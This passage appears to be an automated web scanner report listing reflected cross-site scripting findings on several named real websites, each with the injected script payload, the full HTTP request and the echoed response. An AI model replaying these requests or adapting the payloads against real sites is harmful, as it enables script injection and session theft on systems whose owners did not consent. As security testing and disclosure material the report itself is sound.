Severity:   High
Confidence:   Certain
Host:   http://www.bloglines.com
Path:   /sub/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 571b2--><script>alert(1)</script>7d4838203da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /sub/?571b2--><script>alert(1)</script>7d4838203da=1 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6773
Connection: close
Date: Sun, 30 Jan 2011 01:52:27 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Bl
...[SNIP]...
<input type="hidden" name="url" value="?571b2--><script>alert(1)</script>7d4838203da=1" />
...[SNIP]...

5.303. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloglines.com
Path:   /sub/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6488"><script>alert(1)</script>ca0eedc370c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sub/?a6488"><script>alert(1)</script>ca0eedc370c=1 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6770
Connection: close
Date: Sun, 30 Jan 2011 01:52:26 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Bl
...[SNIP]...
<form method="post" action="http://dashboard.bloglines.com/subscribe.php?url=?a6488"><script>alert(1)</script>ca0eedc370c=1">
...[SNIP]...

5.304. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloglines.com
Path:   /sub/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc6fa<script>alert(1)</script>715c72a1043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sub/?fc6fa<script>alert(1)</script>715c72a1043=1 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6764
Connection: close
Date: Sun, 30 Jan 2011 01:52:27 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Bl
...[SNIP]...
<p>Click here to subscribe to ?fc6fa<script>alert(1)</script>715c72a1043=1</p>
...[SNIP]...

5.305. http://www.co2stats.com/propres.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.co2stats.com
Path:   /propres.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb89e'%3balert(1)//42e64c5198f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb89e';alert(1)//42e64c5198f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /propres.php?s=/bb89e'%3balert(1)//42e64c5198f1138 HTTP/1.1
Host: www.co2stats.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:05:00 GMT
Server: Apache/2.2.17
Content-Length: 3370
Content-Type: text/html

var co2stats_width = 0, co2stats_height = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
co2stats_width = window.innerWidth;
co2stats_height = window.innerHeight;
} else if( documen
...[SNIP]...
<a href="http://www.co2stats.com/certpro.php?s=/bb89e';alert(1)//42e64c5198f1138&ref='+location.href+'" onmouseover="co2stats_onhover();" onmouseout="co2stats_onmouseout();" onclick="window.open(\'http://www.co2stats.com/certpro.php?s=/bb89e';alert(1)//42e64c5198f1138&ref='+lo
...[SNIP]...

5.306. http://www.co2stats.com/propres.php [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.co2stats.com
Path:   /propres.php

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b06c6'%3balert(1)//9c21dfc1ee was submitted in the s parameter. This input was echoed as b06c6';alert(1)//9c21dfc1ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /propres.php?s=1138b06c6'%3balert(1)//9c21dfc1ee HTTP/1.1
Host: www.co2stats.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:04:48 GMT
Server: Apache/2.2.17
Content-Length: 3102
Content-Type: text/html

var co2stats_width = 0, co2stats_height = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
co2stats_width = window.innerWidth;
co2stats_height = window.innerHeight;
} else if( documen
...[SNIP]...
<a href="http://www.co2stats.com/certpro.php?s=1138b06c6';alert(1)//9c21dfc1ee&ref='+location.href+'" onmouseover="co2stats_onhover();" onmouseout="co2stats_onmouseout();" onclick="window.open(\'http://www.co2stats.com/certpro.php?s=1138b06c6';alert(1)//9c21dfc1ee&ref='+location
...[SNIP]...

5.307. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 492d1'><script>alert(1)</script>6033be6539a was submitted in the REST URL parameter 4. This input was echoed as 492d1\'><script>alert(1)</script>6033be6539a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'><script>alert(1)</script>6033be6539a/ HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 23:24:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=3a5cef17df808cf07e6579d534901881; path=/
Last-Modified: Sat, 29 Jan 2011 23:24:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1\'><script>alert(1)</script>6033be6539a/' hreflang='en' >
...[SNIP]...

5.308. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be141'><script>alert(1)</script>17b62cd0d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be141\'><script>alert(1)</script>17b62cd0d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/?be141'><script>alert(1)</script>17b62cd0d2=1 HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:24:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Link: <http://www.davidpoll.com/?p=403>; rel=shortlink
Set-Cookie: PHPSESSID=a28e55f39dc8a2744271fd0ad7b381f0; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/?be141\'><script>alert(1)</script>17b62cd0d2=1' hreflang='en' >
...[SNIP]...

5.309. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/plugins/tweetable/main_css.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5ad37'><script>alert(1)</script>899882eab2b was submitted in the REST URL parameter 1. This input was echoed as 5ad37\'><script>alert(1)</script>899882eab2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content5ad37'><script>alert(1)</script>899882eab2b/plugins/tweetable/main_css.css HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:22:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:22:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content5ad37\'><script>alert(1)</script>899882eab2b/plugins/tweetable/main_css.css' hreflang='en' >
...[SNIP]...

5.310. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/plugins/tweetable/main_css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1622'><script>alert(1)</script>60670df59c9 was submitted in the REST URL parameter 2. This input was echoed as b1622\'><script>alert(1)</script>60670df59c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb1622'><script>alert(1)</script>60670df59c9/tweetable/main_css.css HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:22:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:22:59 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/pluginsb1622\'><script>alert(1)</script>60670df59c9/tweetable/main_css.css' hreflang='en' >
...[SNIP]...

5.311. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/plugins/tweetable/main_css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9b3f'><script>alert(1)</script>fcedbfe1dcc was submitted in the REST URL parameter 3. This input was echoed as d9b3f\'><script>alert(1)</script>fcedbfe1dcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tweetabled9b3f'><script>alert(1)</script>fcedbfe1dcc/main_css.css HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:20 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/plugins/tweetabled9b3f\'><script>alert(1)</script>fcedbfe1dcc/main_css.css' hreflang='en' >
...[SNIP]...

5.312. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/plugins/tweetable/main_css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a769'><script>alert(1)</script>42dc73b4f0d was submitted in the REST URL parameter 4. This input was echoed as 7a769\'><script>alert(1)</script>42dc73b4f0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tweetable/main_css.css7a769'><script>alert(1)</script>42dc73b4f0d HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css7a769\'><script>alert(1)</script>42dc73b4f0d' hreflang='en' >
...[SNIP]...

5.313. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d3c'><script>alert(1)</script>a88048e9c66 was submitted in the REST URL parameter 1. This input was echoed as 96d3c\'><script>alert(1)</script>a88048e9c66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content96d3c'><script>alert(1)</script>a88048e9c66/themes/fusion/js/fusion.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:22:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:22:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content96d3c\'><script>alert(1)</script>a88048e9c66/themes/fusion/js/fusion.js' hreflang='en' >
...[SNIP]...

5.314. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4af6'><script>alert(1)</script>94b0369aa was submitted in the REST URL parameter 2. This input was echoed as f4af6\'><script>alert(1)</script>94b0369aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesf4af6'><script>alert(1)</script>94b0369aa/fusion/js/fusion.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:14 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themesf4af6\'><script>alert(1)</script>94b0369aa/fusion/js/fusion.js' hreflang='en' >
...[SNIP]...

5.315. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4de2c'><script>alert(1)</script>9f9243aaacf was submitted in the REST URL parameter 3. This input was echoed as 4de2c\'><script>alert(1)</script>9f9243aaacf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusion4de2c'><script>alert(1)</script>9f9243aaacf/js/fusion.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:30 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusion4de2c\'><script>alert(1)</script>9f9243aaacf/js/fusion.js' hreflang='en' >
...[SNIP]...

5.316. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a3d83'><script>alert(1)</script>9a983a4fff9 was submitted in the REST URL parameter 4. This input was echoed as a3d83\'><script>alert(1)</script>9a983a4fff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusion/jsa3d83'><script>alert(1)</script>9a983a4fff9/fusion.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusion/jsa3d83\'><script>alert(1)</script>9a983a4fff9/fusion.js' hreflang='en' >
...[SNIP]...

5.317. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7bac8'><script>alert(1)</script>5932159de94 was submitted in the REST URL parameter 5. This input was echoed as 7bac8\'><script>alert(1)</script>5932159de94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusion/js/fusion.js7bac8'><script>alert(1)</script>5932159de94 HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:24:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:24:06 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js7bac8\'><script>alert(1)</script>5932159de94' hreflang='en' >
...[SNIP]...

5.318. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/themes/fusion/style.css

Issue detail

